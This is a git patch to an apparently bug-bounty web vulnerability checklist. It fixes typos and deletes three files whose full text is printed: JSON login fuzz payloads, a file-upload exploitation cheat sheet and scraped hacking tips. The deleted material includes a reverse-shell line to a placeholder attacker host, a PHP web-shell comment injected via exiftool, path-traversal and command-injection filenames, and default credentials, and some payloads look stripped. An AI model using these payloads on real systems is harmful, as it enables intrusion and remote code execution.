From 1f2417083cba8c7ea74b5aeadbc85b6e5c8cf19c Mon Sep 17 00:00:00 2001 From: Maksim Partsiankou Date: Tue, 10 Dec 2024 19:13:29 +0100 Subject: [PATCH 1/3] fix typos in text --- Acount takeover/ATO.md | 6 +- Admin panal/adminpanal.md | 8 +- Aem misconfiguration/aem.md | 8 +- Api Authentication /Authentication.md | 771 -------------------------- Bussiness Logic/bussiness logic.md | 6 +- CSRF/csrf.md | 2 +- Cookie Attack/cookie.md | 26 +- File Upload/File Upload.md | 239 -------- IDOR Vulnerability/idor.md | 14 +- RXSS/xss.md | 4 +- exif Vulnerability/exif_geo.md | 6 +- register vulnerability/register.md | 16 +- tips from twitter /tips_twitter.md | 325 ----------- 13 files changed, 48 insertions(+), 1383 deletions(-) delete mode 100644 Api Authentication /Authentication.md delete mode 100644 File Upload/File Upload.md delete mode 100644 tips from twitter /tips_twitter.md diff --git a/Acount takeover/ATO.md b/Acount takeover/ATO.md index 2795d13..611a9a2 100644 --- a/Acount takeover/ATO.md +++ b/Acount takeover/ATO.md @@ -52,7 +52,7 @@ Occasionally, the application displays unnecessary data, such as valid OTPs, has [ ] **password reset** ``` 1. check if you are able to brute force the password reset OTP -2. test for token predectability +2. test for token predictability 3. test for JWT misconfigurations 4. check if the password reset endpoint is vulnerable to IDOR 5. check if the password reset endpoint is vulnerable to Host Header injection @@ -99,7 +99,7 @@ if the application does not use auth token or you can't access the cookies becau [ ] **IDOR to Account Takerover** ``` -1. checck if the email update endpoint is vulnerable to IDOR +1. check if the email update endpoint is vulnerable to IDOR 2. check if the password change endpoint is vulnerable to IDOR 3. check if the password reset endpoint vulnerable to IDOR ``` 
@@ -144,7 +144,7 @@ when send rest account request intercept POST Request and Change Host header val [ ] **CORS Misconfiguration to Account Takeover** -If the page contains CORS missconfigurations you might be able to steal sensitive information from the user to takeover his account or make him change auth information for the same purpose: +If the page contains CORS misconfigurations you might be able to steal sensitive information from the user to takeover his account or make him change auth information for the same purpose: ``` https://book.hacktricks.xyz/pentesting-web/cors-bypass ``` diff --git a/Admin panal/adminpanal.md b/Admin panal/adminpanal.md index 349a5e3..5822cdf 100644 --- a/Admin panal/adminpanal.md +++ b/Admin panal/adminpanal.md @@ -1,5 +1,5 @@ -[ ] defualt credentials -[defualt credentials](https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force#default-credentials) +[ ] default credentials +[default credentials](https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force#default-credentials) ``` admin:admin admin:password @@ -7,12 +7,12 @@ author:author administrator:password admin123:password username:pass12345 -and many of defualt credentials +and many of default credentials ``` [ ] Bypass by SQL Injection ``` -inject username or paswword with a lot of payloads: +inject username or password with a lot of payloads: => error based => time based ``` diff --git a/Aem misconfiguration/aem.md b/Aem misconfiguration/aem.md index 7d14e87..b68db24 100644 --- a/Aem misconfiguration/aem.md +++ b/Aem misconfiguration/aem.md @@ -2,7 +2,7 @@ https://www.youtube.com/watch?v=EQNBQCQMouk ##### method - collect sub domain -- use nuclei/nuclei-templates/technologies/tech-detect.yaml to identifiy aem +- use nuclei/nuclei-templates/technologies/tech-detect.yaml to identify aem - Python3 ./aem_hacker.py –u https://example — host localhost - use https://github.com/clarkvoss/AEM-List/blob/main/paths to fuzz on path 
@@ -10,7 +10,7 @@ https://www.youtube.com/watch?v=EQNBQCQMouk - https://github.com/0ang3el/aem-hacker - https://github.com/0ang3el/aem-rce-bundle ``` -python3 aem_hacker.py -u --host yourvpshostname =>comman usage +python3 aem_hacker.py -u --host yourvpshostname =>common usage python3 aem_discovery.py --file urls.txt --workers 150 =>discover url python3 aem_enum.py --url => automate usernames and secrets grabbing python3 aem_ssrf2rce.py --url --fakaem yourvbs @@ -102,7 +102,7 @@ jcr:data=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')% ``` everything is stored in jcr repository : - secrets (password ,encryption key , tokens) -- cinfiguration +- configuration - pII - usernames @@ -136,7 +136,7 @@ everything is stored in jcr repository : - /.ext.json - /.childrenlist.json - or guess node names : - - comman names /content, /home, /var, /etc + - common names /content, /home, /var, /etc - Dump props for each child node of jcr:root : - /etc.json or /etc.s.json or /etc.-1.json diff --git a/Api Authentication /Authentication.md b/Api Authentication /Authentication.md deleted file mode 100644 index 9d2a704..0000000 --- a/Api Authentication /Authentication.md +++ /dev/null 
@@ -1,771 +0,0 @@ -97 JSON Tests for for Authentication Endpoints link pdf [link](https://www.linkedin.com/feed/update/urn:li:activity:7097279293608607746/) - -1. Basic credentials -``` -{ -"login": "admin", -"password": "admin" -} -``` - -2. Empty credentials: -``` -{ -"login": "", -"password": "" -} -``` - -3- Null values: -``` -{ -"login": null, -"password": null -} -``` - -4. Credentials as numbers: -``` -{ -"login": 123, -"password": 456 -} -``` - -6. Credentials as booleans: -``` -{ -"login": true, -"password": false -} -``` - -7. Credentials as arrays: -``` -{ -"login": ["admin"], -"password": ["password"] -} -``` - -8. Credentials as objects: -``` -{ -"login": {"username": "admin", -"password": {"password": "password"}} -} -``` - -9. Special characters in credentials: -``` -{ -"login": "@dm!n", -"password": "p@ssw0rd#" -} -``` - -10. SQL Injection: -``` -{ -"login": "admin' --", -"password": "password" -} -``` - -11. HTML tags in credentials: -``` -{ -"login": "

admin

", -"password": "ololo-HTML-XSS" -} -``` - -12. Unicode in credentials: -``` -{ -"login": "\u0061\u0064\u006D\u0069\u006E", -"password":"\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064" -} -``` - -13. Credentials with escape characters: -``` -{ -"login": "ad\\nmin", -"password": "pa\\ssword" -} -``` - -14. Credentials with white space: -``` -{ -"login": " ", -"password": " " -} -``` - -15. Overlong values: -``` -{ -"login": "a"*10000, -"password": "b"*10000 -} - -``` -16. Malformed JSON (missing brace): -``` -{ -"login": "admin", -"password": "admin" -} -``` - -17. Malformed JSON (extra comma): -``` -{ -"login": "admin", -"password": "admin", -} -``` - -18. Missing login key: -``` -{ -"password": "admin" -} -``` - -19. Missing password key: -``` -{ -"login": "admin" -} -``` - -20. Swapped key values: -``` -{ -"admin": "login", -"password": "password" -} -``` - -21. Extra keys: -``` -{ -"login": "admin", -"password": "admin", -"extra": "extra" -} -``` - -22. Missing colon: -``` -{ -"login" "admin", -"password": "password" -} -``` - -23. Invalid Boolean as credentials: -``` -{ -"login": yes, -"password": no -} -``` - -25. All keys, no values: -``` -{ -"": "", -"": "" -} -``` - -26. Nested objects: -``` -{ -"login": {"innerLogin": "admin", -"password": {"innerPassword": "password"}} -} -``` -27. Case sensitivity testing: -``` -{ -"LOGIN": "admin", -"PASSWORD": "password" -} -``` - -28. Login as a number, password as a string: -``` -{ -"login": 1234, -"password": "password" -} -``` - -29. Login as a string, password as a number: -``` -{ -"login": "admin", -"password": 1234 -} -``` - -30. Repeated keys: -``` -{ -"login": "admin", -"login": "user", -"password": "password" -} -``` -31. Single quotes instead of double: -``` -{ -'login': 'admin', -'password': 'password' -} -``` -33. Login and password with only special characters: -``` -{ -"login": "@#$%^&*", -"password": "!@#$%^&*" -} -``` -34. 
Unicode escape sequence: -``` -{ -"login": "\u0041\u0044\u004D\u0049\u004E", -"password":"\u0050\u0041\u0053\u0053\u0057\u004F\u0052\u0044" -} -``` - -35. Value as object instead of string: -``` -{ -"login": {"$oid": -"507c7f79bcf86cd7994f6c0e"}, -"password": "password"} -} -``` - -37. Nonexistent variables as values: -``` -{ -"login": undefined, -"password": undefined -} -``` - -38. Extra nested objects: -``` -{ -"login": "admin", -"password": "password", -"extra": {"key1": "value1", -"key2": "value2"} -} - -``` - -39. Hexadecimal values: -``` -{ -"login": "0x1234", -"password": "0x5678" -} -``` - -40. Extra symbols after valid JSON: -``` -{ -"login": "admin", -"password": "password"}@@@@@@ -} -``` - -41. Only keys, without values: -``` -{ -"login":, -"password": -} -``` - -42. Insertion of control characters: -``` -{ -"login": "ad\u0000min", -"password": "pass\u0000word" -} -``` - -43. Long Unicode Strings: -``` -{ -"login": "\u0061"*10000, -"password": "\u0061"*10000 -} -``` - -44. Newline Characters in Strings: -``` -{ -"login": "ad\nmin", -"password": "pa\nssword" -} -``` - -45. Tab Characters in Strings: -``` -{ -"login": "ad\tmin", -"password": "pa\tssword" -} -``` - -46. Test with HTML content in Strings: -``` -{ -"login": "admin", -"password": "password" -} -``` - -47. JSON Injection in Strings: -``` -{ -"login": "{\"injection\":\"value\"}", -"password": "password" -} -``` - -48. Test with XML content in Strings: -``` -{ -"login": "admin", -"password": "password" -} -``` - -49. Combination of Number, Strings, and Special characters: -``` -{ -"login": "ad123min!@", -"password": "pa55w0rd!@" -} -``` - -50. Use of environment variables: -``` -{ -"login": "${USER}", -"password": "${PASS}" -} -``` - -51. Backslashes in Strings: -``` -{ -"login": "ad\\min", -"password": "pa\\ssword" -} -``` - -52. Long strings of special characters: -``` -{ -"login": "!@#$%^&*()"*1000, -"password": "!@#$%^&*()"*1000 -} -``` - -53. 
Empty Key in JSON: -``` -{ -"": "admin", -"password": "password" -} -``` - -55. JSON Injection in Key: -``` -{ -"{\"injection\":\"value\"} -": "admin", -"password": "password" -} -``` - -56. Quotation marks in strings: -``` -{ -"login": "\"admin\"", -"password": "\"password\"" -} -``` - -57. Credentials as nested arrays: -``` -{ -"login": [["admin"]], -"password": [["password"]] -} -``` - -58. Credentials as nested objects: -``` -{ -"login": {"username": {"value": "admin", -"password": {"password": {"value": -"password" -} -``` - -59. Keys as numbers: -``` -{ -123: "admin", -456: "password" -} -``` - -60. Testing with greater than and less than signs: -``` -{ -"login": "admin>1", -"password": "alert('hi')", -"password": "password" -} -``` - -85. Negative numbers as strings: -``` -{ -"login": "-123", -"password": "-456" -} -``` - -86. Values as URLs: -``` -{ -"login": "https://admin.com", -"password": "https://password.com" -} -``` - -87. Strings with email format: -``` -{ -"login": "admin@admin.com", -"password": "password@password.com" -} -``` -88. Strings with IP address format: -``` -{ -"login": "192.0.2.0", -"password": "203.0.113.0" -} -``` - -89. Strings with date format: -``` -{ -"login": "2023-08-03", -"password": "2023-08-04" -} -``` - -90. JSON with exponential values: -``` -{ -"login": 1e+30, -"password": 1e+30 -} -``` - -91. JSON with negative exponential values: -``` -{ -"login": -1e+30, -"password": -1e+30 -} -``` - -92. Using Zero Width Space (U+200B) in strings: -``` -{ -"login": "admin​", -"password": "password​" -} -``` - -93. Using Zero Width Joiner (U+200D) in strings: -``` -{ -"login": "adminâ€", -"password": "passwordâ€" -} -``` - -94. JSON with extremely large numbers: -``` -{ -"login": 12345678901234567890, -"password": 12345678901234567890 -} -``` - -95. Strings with backspace characters: -``` -{ -"login": "admin\b", -"password": "password\b" -} -``` - -96. 
Test with emoji in strings: -``` -{ -"login": "admin😀", -"password": "password😀" -} -``` - -97. JSON with comments, although they are not officially supported in JSON: -``` -{ -/*"login": "admin", -"password": "password"*/ -} -``` - -98. JSON with base64 encoded values: -``` -{ -"login": "YWRtaW4=", -"password": "cGFzc3dvcmQ=" -} -``` - -99. Including null byte character (may cause truncation): -``` -{ -"login": "admin\0", -"password": "password\0" -} -``` - -100. JSON with credentials in scientific notation: -``` -{ -"login": 1e100, -"password": 1e100 -} -``` - -102. Strings with octal values: -``` -{ -"login": "\141\144\155\151\156", -"password":"\160\141\163\163\167\157\162\144" -} -``` -103. writeup -``` -{ -root:{ -"username": "admin", -"password":"admin" -} -} -``` - -104. writeup -``` -basic => username=admin -username[]=admin -username[0]=admin -username=admin&username=admin -delete username=admin - -``` diff --git a/Bussiness Logic/bussiness logic.md b/Bussiness Logic/bussiness logic.md index a29f670..affda97 100644 --- a/Bussiness Logic/bussiness logic.md +++ b/Bussiness Logic/bussiness logic.md @@ -1,6 +1,6 @@ 1. change the price with other price :100->50 -2. change the price with nagative price :100->-100 -3. change the price with other price by add nagative value: 100 ->(+-120) +2. change the price with negative price :100->-100 +3. change the price with other price by add negative value: 100 ->(+-120) 4. change the price with other price by mult by 0.5: 100->(0.5*100) 5. Retrieving a Profile ``` @@ -198,5 +198,5 @@ from URLs or by using some internal parameters. • Once a target parameter has been identified start doing basic brute force or guess work to fetch another user’s files from server. ``` -26. null pyloads +26. null payloads 27. in change password try to delete current password diff --git a/CSRF/csrf.md b/CSRF/csrf.md index 9dba5d9..68e2fc9 100644 --- a/CSRF/csrf.md +++ b/CSRF/csrf.md 
@@ -88,7 +88,7 @@ email=....&csrftoken=..... - steps 1- create two accounts 2- go to the first account and change email we will change -3- go to second account and try intersept change email then drop request , copy the csrf token +3- go to second account and try intercept change email then drop request , copy the csrf token 4- go to the first account and put csrf token(second account) and try change email is valid or not diff --git a/Cookie Attack/cookie.md b/Cookie Attack/cookie.md index 2e773c4..d0e8fb1 100644 --- a/Cookie Attack/cookie.md +++ b/Cookie Attack/cookie.md @@ -1,6 +1,6 @@ -[ ] sensetive Data Stored in Cookies +[ ] sensitive Data Stored in Cookies ``` -check if anf pii or other sensitive infromation stored in cookies this in fromation usually includes : email,sessionID, data of birth ,mobile address ,ssn ,etc. +check if anf pii or other sensitive information stored in cookies this information usually includes : email, sessionID, data of birth, mobile address, ssn, etc. ``` [ ] cookie length violation @@ -24,12 +24,12 @@ some times it can be used to escalate privilege or if the application malfunctio [ ] Mass Assignment ``` -similar to the parameter poolution, however in this , attacker tried to inject multiple user ID in same user_id parameter +similar to the parameter pollution, however in this , attacker tried to inject multiple user ID in same user_id parameter ``` [ ] Damial of service - cookie Bomb ``` -forcing the server to process cookies larger than the resricted cookie size defined by the server may cause danial of service attack +forcing the server to process cookies larger than the restricted cookie size defined by the server may cause danial of service attack https://target.com/index.php?param1=xxxxxxxxxxxxxxxxxxxxxx 
@@ -64,7 +64,7 @@ sqlmap -u "" --cookie="" -p "" --dbs - the application is not retrieve data it is not vulnerability ``` -[ ] Authentication Bybass (cookie are not avalid) +[ ] Authentication Bybass (cookie are not valid) ``` try accessing a protected resource by removing cookies ``` @@ -77,9 +77,9 @@ change the "name" value to "xss payload" [ ] Insufficient session management ``` -1. session doesnt expire on logout -2. long session expirey -3. session doesnt expire on password reset /change +1. session doesn't expire on logout +2. long session expired +3. session doesn't expire on password reset /change 4. concurrent session ``` @@ -87,7 +87,7 @@ change the "name" value to "xss payload" - horizontal ``` 1.assume that the application uses mult-organization models -2.cookie are used wich organized user can access +2.cookie are used which organized user can access 3.alter the cookie in order to access some other application ``` - vertical @@ -98,12 +98,12 @@ change the "name" value to "xss payload" - similarly ``` 1.try if the flower users cookies can be used to access higher users function -2.try if the cookie of organization 1 user van be used to access function of organizaion 2 +2.try if the cookie of organization 1 user van be used to access function of organization 2 ``` -[ ] sesion puzzing +[ ] session puzzling ``` -when an application utilzes the same session variable for multiple purposes , this can abused by an attacker to trick the application and perform the action as an authenticated or privileged user +when an application utilizes the same session variable for multiple purposes , this can abused by an attacker to trick the application and perform the action as an authenticated or privileged user ``` 
@@ -157,7 +157,7 @@ str("-"*50),__import__('os').popen('COMMAND').read() ``` [ ] Insecure Deserialization ``` - if cookis are using serialized Objects ,try performing insecure Deserialization Checks. + if cookies are using serialized Objects ,try performing insecure Deserialization Checks. portswigger laps ``` [ ] Electronic Code Book diff --git a/File Upload/File Upload.md b/File Upload/File Upload.md deleted file mode 100644 index 0da15b1..0000000 --- a/File Upload/File Upload.md +++ /dev/null 
@@ -1,239 +0,0 @@ -## Where to find -In upload file feature, for example upload photo profile feature - -## How to exploit -read also this pdf it conayin a many of ideas -1-https://github.com/Az0x7/vulnerability-Checklist/blob/main/File%20Upload/File-Upload.pdf by`0xAwali` -2-https://github.com/Az0x7/vulnerability-Checklist/blob/main/File%20Upload/Slides(1).pdf by`ebrahim hegazy` - -1. Change the `Content-Type` value -``` -POST /images/upload/ HTTP/1.1 -Host: target.com -... - ----------------------------829348923824 -Content-Disposition: form-data; name="uploaded"; filename="dapos.php" -Content-Type: application/x-php -``` -Change the Content-Type -``` -POST /images/upload/ HTTP/1.1 -Host: target.com -... - ----------------------------829348923824 -Content-Disposition: form-data; name="uploaded"; filename="dapos.php" -Content-Type: image/jpeg -``` - -2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file -``` -POST /images/upload/ HTTP/1.1 -Host: target.com -... - ----------------------------829348923824 -Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg" -Content-Type: application/x-php -``` -Change the request to this -``` -POST /images/upload/ HTTP/1.1 -Host: target.com -... - ----------------------------829348923824 -Content-Disposition: form-data; name="uploaded"; filename="dapos.php" -Content-Type: application/x-php -``` - -3. Upload the payload, but start with GIF89a; and -``` -POST /images/upload/ HTTP/1.1 -Host: target.com -... - ----------------------------829348923824 -Content-Disposition: form-data; name="uploaded"; filename="dapos.php" -Content-Type: image/gif - -GIF89a; -``` -And dont forget to change the content-type to image/gif - -4. Bypass content length validation, it can be bypassed using small payload -``` -() -``` - -5. Using null byte in filename -``` -file.php%00.gif -``` - -6. 
Using double extensions for the uploaded file -``` -file.jpg.php -``` - -7. Uploading an unpopular php extensions (php4,php5,php6,phtml) -``` -file.php5 -``` - -8. Try to randomly capitalizes the file extension -``` -file.pHP5 -``` - -9. Mix the tips! - - -- Upload Function - - Extensions Impact - - `ASP`, `ASPX`, `PHP5`, `PHP`, `PHP3`: Webshell, RCE - - `SVG`: Stored XSS, SSRF, XXE - - `GIF`: Stored XSS, SSRF - - `CSV`: CSV injection - - `XML`: XXE - - `AVI`: LFI, SSRF - - `HTML`, `JS` : HTML injection, XSS, Open redirect - - `PNG`, `JPEG`: Pixel flood attack (DoS) - - `ZIP`: RCE via LFI, DoS - - `PDF`, `PPTX`: SSRF, BLIND XXE - - Blacklisting Bypass - - PHP → `.phtm`, `phtml`, `.phps`, `.pht`, `.php2`, `.php3`, `.php4`, `.php5`, `.shtml`, `.phar`, `.pgif`, `.inc` - - ASP → `asp`, `.aspx`, `.cer`, `.asa` - - Jsp → `.jsp`, `.jspx`, `.jsw`, `.jsv`, `.jspf` - - Coldfusion → `.cfm`, `.cfml`, `.cfc`, `.dbm` - - Using random capitalization → `.pHp`, `.pHP5`, `.PhAr` - - Whitelisting Bypass - - `file.jpg.php` - - `file.php.jpg` - - `file.php.blah123jpg` - - `file.php%00.jpg` - - `file.php\x00.jpg` this can be done while uploading the file too, name it `file.phpD.jpg` and change the D (44) in hex to 00. - - `file.php%00` - - `file.php%20` - - `file.php%0d%0a.jpg` - - `file.php.....` - - `file.php/` - - `file.php.\` - - `file.php#.png` - - `file.` - - `.html` - - Vulnerabilities - - [ ] Directory Traversal - - Set filename `../../etc/passwd/logo.png` - - Set filename `../../../logo.png` as it might changed the website logo. - - [ ] SQL Injection - - Set filename `'sleep(10).jpg`. - - Set filename `sleep(10)-- -.jpg`. - - [ ] Command Injection - - Set filename `; sleep 10;` - - [ ] SSRF - - Abusing the "Upload from URL", if this image is going to be saved in some public site, you could also indicate a URL from [IPlogger](https://iplogger.org/invisible/) and steal information of every visitor. - - SSRF Through `.svg` file. 
- - ```php - - ``` - - - [ ] ImageTragic - - ``` - push graphic-context - viewbox 0 0 640 480 - fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)' - pop graphic-context - ``` - - - [ ] XXE - - Upload using `.svg` file - - ```xml - - ]> - - &xxe; - - ``` - - ```xml - - - - ``` - - - Using excel file - - [ ] XSS - - Set file name `filename="svg onload=alert(document.domain)>"` , `filename="58832_300x300.jpg"` - - Upload using `.gif` file - - ``` - GIF89a/**/=alert(document.domain)//; - ``` - - - Upload using `.svg` file - - ```xml - - ``` - - ```xml - - - - - - - - ``` - - - [ ] Open Redirect - 1. Upload using `.svg` file - - ```xml - - - - - - - ``` - - - Content-ish Bypass - - [ ] Content-type validation - - Upload `file.php` and change the `Content-type: application/x-php` or `Content-Type : application/octet-stream` - to `Content-type: image/png` or `Content-type: image/gif` or `Content-type: image/jpg`. - - [ ] Content-Length validation - - Small PHP Shell - - ```php - () - ``` - - - [ ] Content Bypass Shell - - If they check the Content. Add the text "GIF89a;" before you shell-code. ( `Content-type: image/gif` ) - - ```php - GIF89a; - ``` - - - Misc - - [ ] Uploading `file.js` & `file.config` (web.config) - - [ ] Pixel flood attack using image - - [ ] DoS with a large values name: `1234...99.png` - - [ ] Zip Slip - - If a site accepts `.zip` file, upload `.php` and compress it into `.zip` and upload it. Now visit, `site.com/path?page=zip://path/file.zip%23rce.php` - - [ ] Image Shell - - Exiftool is a great tool to view and manipulate exif-data. Then I will to rename the file `mv pic.jpg pic.php.jpg` - - ```php - exiftool -Comment='"; system($_GET['cmd']); ?>' pic.jpg - ``` diff --git a/IDOR Vulnerability/idor.md b/IDOR Vulnerability/idor.md index d958e7c..f365a1e 100644 --- a/IDOR Vulnerability/idor.md +++ b/IDOR Vulnerability/idor.md 
@@ -7,13 +7,13 @@ Base Steps: ``` [ ] -[ ] image profilie -[ ] delete acount -[ ] infromation acount +[ ] image profile +[ ] delete account +[ ] information account [ ] VIEW & DELETE & Create api_key [ ] allows to read any comment [ ] change price -[ ] chnage the coin from dollar to uaro +[ ] change the coin from dollar to uaro [ ] Try decode the ID, if the ID encoded using md5,base64,etc ```html GET /GetUser/dmljdGltQG1haWwuY29t @@ -74,7 +74,7 @@ GET /api/users/* [ ] Never ignore encoded/hashed ID ```bash -for hashed ID ,create multiple accounts and understand the ppattern application users to allot an iD +for hashed ID ,create multiple accounts and understand the pattern application users to allot an iD ``` [ ] Google Dorking/public form @@ -87,7 +87,7 @@ search all the endpoints having ID which the search engine may have already inde use tools like arjun , paramminer ``` -[ ] Bypass object level authorization Add parameter onto the endpoit if not present by defualt +[ ] Bypass object level authorization Add parameter onto the endpoint if not present by default ```bash GET /api_v1/messages ->200 GET /api_v1/messages?user_id=victim_uuid ->200 @@ -125,7 +125,7 @@ GET /user_data/2341.txt -> 200 {"userid":{"userid":123}} ->200 ``` -[ ] Test an outdata API version +[ ] Test an outdated API version ```bash GET /v3/users_data/1234 ->401 GET /v1/users_data/1234 ->200 diff --git a/RXSS/xss.md b/RXSS/xss.md index 8ff286a..f437174 100644 --- a/RXSS/xss.md +++ b/RXSS/xss.md @@ -42,7 +42,7 @@ https://github.com/yavolo/eventlistener-xss-recon - use your payloads :``   -- your report if not acceptd  +- your report if not accepted  - cat host.txt | crawler | tee -a endpoint.txt   & cat host.txt | waybackurl | tee -a endpoint.txt  
@@ -71,7 +71,7 @@ XSS.yaml : gist.githubusercontent.com/raoufmaklouf/7…  ### third method ``` -irst of all, I enumerated all subdomains of the target.com with [subfinder](https://github.com/projectdiscovery/subfinder) and +First of all, I enumerated all subdomains of the target.com with [subfinder](https://github.com/projectdiscovery/subfinder) and then subdomain brute-forcing with [knockpy](https://github.com/guelfoweb/knock), then I used [waybackurls](https://github.com/tomnomnom/waybackurls) to get parameters to test for XSS and then I used [gf](https://github.com/tomnomnom/gf) to get possible XSS parameters. after sorting the URLs I used [KXSS](https://github.com/Emoe/kxss) diff --git a/exif Vulnerability/exif_geo.md b/exif Vulnerability/exif_geo.md index 8bf3d6e..5c7a1a8 100644 --- a/exif Vulnerability/exif_geo.md +++ b/exif Vulnerability/exif_geo.md @@ -4,12 +4,12 @@ When a user uploads an image in example.com, the uploaded image’s EXIF Geoloca

Steps to reproduce:

1. Got to Github ( https://github.com/ianare/exif-samples/tree/master/jpg)
-2. There are lot of images having resolutions (i.e 1280 * 720 ) , and also whith different MB’s .
+2. There are lot of images having resolutions (i.e 1280 * 720 ) , and also with different MB’s .
3. Go to Upload option on the website
4. Upload the image
-5. see the path of uploaded image ( Either by right click on image then copy image address OR right click, inspect the image, the URL will come in the inspect , edit it as html )
+5. see the path of uploaded image ( Either by right click on image then copy image address OR right click, inspect the image, the URL will come in the inspect, edit it as html )
6. open it (http://exif.regex.info/exif.cgi)
-7. See wheather is that still showing exif data , if it is then Report it. +7. See weather is that still showing exif data, if it is then Report it. # Reports (Hackerone) diff --git a/register vulnerability/register.md b/register vulnerability/register.md index b8dec7a..7d229c9 100644 --- a/register vulnerability/register.md +++ b/register vulnerability/register.md @@ -4,8 +4,8 @@ 1. create first account in application with email say abc@gmail.com and password 2. logout of the account and create another account with same email and different password 3. you can even try to change email case like from abc2gmail.com to Abc@gmail.com -4. finish the creation proccess and see that it succceed -5. now go back and try to login with email and the new password ,you are seccess logged in +4. finish the creation process and see that it succeed +5. now go back and try to login with email and the new password, you are success logged in ``` [ ] Dos at name /password field in sign up page ``` @@ -16,8 +16,8 @@ [ ] no rate limit at signup page ``` -1. enter your details in signuo form and submit the form -2. capture the signuo request and send it to intruder +1. enter your details in signup form and submit the form +2. capture the signup request and send it to intruder 3. add $$ to email parameter 4. in the payload add different email address 5. fire up intruder and check whether it return 200 ok @@ -33,11 +33,11 @@ xss can be test in any of parameter [ ] email varification can be easily bypassed with following method ``` -1. response manipulation change the bad respone with good one like false to true +1. response manipulation change the bad response with good one like false to true 2. status code manipulation change the 403 to 200 ``` -[ ] weak register implemntation +[ ] weak register implementation ``` 1. check whether the allows disposable email addresses 2. register form on non-https page 
@@ -45,7 +45,7 @@ xss can be test in any of parameter [ ] weak password policy ``` -1. check whether application allows easily guessable passsword like 123456 +1. check whether application allows easily guessable password like 123456 2. check if you can use username same as the email address 3. check if can use password same as that email address 4. improperly implemented password recovery link functionality @@ -53,5 +53,5 @@ xss can be test in any of parameter [ ] Path Overwrite ``` -If an application allows users to check their profile with direct path /{username} always try to signup with system reserved file names, such as index.php, signup.php, login.php, etc. In some cases what happens here is, when you signup with username: index.php, now upon visiting target.tld/index.php, your profile will comeup and occupy the index.php page of an application. Similarly, if an attacker is able to signup with username login.php, Imagine login page getting takeovered. +If an application allows users to check their profile with direct path /{username} always try to signup with system reserved file names, such as index.php, signup.php, login.php, etc. In some cases what happens here is, when you signup with username: index.php, now upon visiting target.tld/index.php, your profile will come up and occupy the index.php page of an application. Similarly, if an attacker is able to signup with username login.php, Imagine login page getting take overed. ``` diff --git a/tips from twitter /tips_twitter.md b/tips from twitter /tips_twitter.md deleted file mode 100644 index c5852b9..0000000 --- a/tips from twitter /tips_twitter.md +++ /dev/null 
@@ -1,325 +0,0 @@ -[ ] Tip 1 -``` -Here’s my last finding (P1) -1- register account -2- intercept request -3- here’s the response in image so in “role” parameter we have ROLE_USER -So i don’t know what i can replace it to privilege my account to admin -4- open source code and look in js files -5-So in js files i user ctrl+F to search about “user_role” i found another value that’s called “admin_role” -6- so i use match and replace to replace value’s -7- boom privilege my account to admin account with full control -``` -[ ] Tip 2 -``` -اسعد الله ايامكم بكل خير - -هذا ثغرة في شركة مايكروسوفت -كانت جدا بسيطة بسبب خطأ في اعداد سيرفر IIS - -Exploit: -https//anywebsite.com/c:/Windows/Win.ini -``` - -[ ] Tip 3 -``` -CloudFront bypass:⚔️ - -">%0D%0A%0D%0A - -Would be interested to know if this is target specific or other CloudFront websites are vulnerable -``` - -[ ] Tip 4 - -``` -1 : Get all the URL from wayback / Gau -2 : Filter out the js file using httpx -3 : Check Mnauly all the js file or you can use nuclei template or used @trufflesec chrome extension -``` -[ ] Tip 5 -``` -target.com/wp-config.php => 404 not found -target.com/wp-config.php.… ==> 200 ok and downloaded -wp-config.php.swp ==>>200 ok - -after that if its contain encoded using hexadecimal decode it . 
-``` - -[ ] Tip 6 -``` -try testing for SQLi Authentication Bypass :⚔️ -username:'--'/"--" -password:'--'/"--" -``` -[ ] Tip 7 -``` -default credentials: -PSADMIN:PSADMIN -PS:PS -PSEM:PSEM -Google Dork: intitle:"Oracle+PeopleSoft+Sign-in" -Wrote a nuclei template to test all permutations -``` -[ ] Tip 8 -``` -nmap -sV -iL host.txt -oN nmap_scan.txt -Wait a few hours -cat nmap_scan.txt | grep open -``` - -[ ] Tip 9 -```Bybass cloudfaire with cynses search -https://youtu.be/VsM6ERUx_AA ------------------------------------------- ------------------------------------------- -Xss payload -https://github.com/Aacle/xss_payload ------------------------------------------- ------------------------------------------- -Use Nuclei for leaked api. -$ nuclei -t /nuclei-templates/token-spray/ -var token={yourToken} ------------------------------------------- ------------------------------------------- -#Scan through #TOR -sqlmap -u “http://target_server/” --tor --tor-type=SOCKS5 ------------------------------------------- ------------------------------------------- -Tip: - always check company's/Organization employees GitHub account for leaked ghp_ token, -and check access to each repo of main organization - ------------------------------------------- ------------------------------------------- - -bypass alert ==> [alert][0].call(this,1) ------------------------------------------- ------------------------------------------- -``` - -[ ] Tip 10 -``` -1_ Go to SHODAN and get the IP -2 _ Go to Dirsearch and do a Fuzzing -3_ Obtaining sensitive data -``` -[ ] Tip 11 -``` -Recon Recon Recon!! -Shodan Dorking Always wins. - -ssl:"Company Inc" -Filter results by http title. -Start fuzzing an interesting asset. -Found swagger-ui/ -Tried swagger ui xss with -https://github.com/seanmarpo/webjars-swagger-xss -``` -[ ] Tip 12 -``` -Have you ever heard about wc-db file disclosure?! 
